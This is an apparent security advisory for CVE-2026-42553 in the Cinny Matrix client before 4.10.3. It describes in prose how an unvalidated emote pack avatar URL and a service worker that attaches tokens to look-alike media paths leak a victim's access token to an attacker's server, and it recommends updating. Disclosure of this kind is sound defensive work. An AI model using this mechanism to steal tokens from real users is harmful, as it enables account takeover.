CVE-2026-42553

Name of the Vulnerable Software and Affected Versions Cinny versions prior to 4.10.3

Description A remote authenticated attacker who shares a room with a victim and has permissions to create room emotes can cause the victim's client to send their Matrix access token to an attacker-controlled server. This happens when the victim opens the emoji or sticker picker in a room containing a malicious emote pack. The issue stems from an incorrect fallback in the EmojiBoard component that uses the untrusted pack.meta.avatar variable without validating it as an MXC URL, allowing arbitrary HTTP(S) URLs. Additionally, the service worker attaches the user's Authorization bearer token to all outbound GET requests containing the endpoints '/ matrix/client/v1/media/download' or '/ matrix/client/v1/media/thumbnail' without verifying that the request host matches the configured homeserver origin. An attacker-controlled URL containing these path fragments and permissive CORS (Cross-Origin Resource Sharing, a mechanism that allows restricted resources on a web page to be requested from another domain) will receive the victim's Authorization header.

Recommendations Update to version 4.10.3.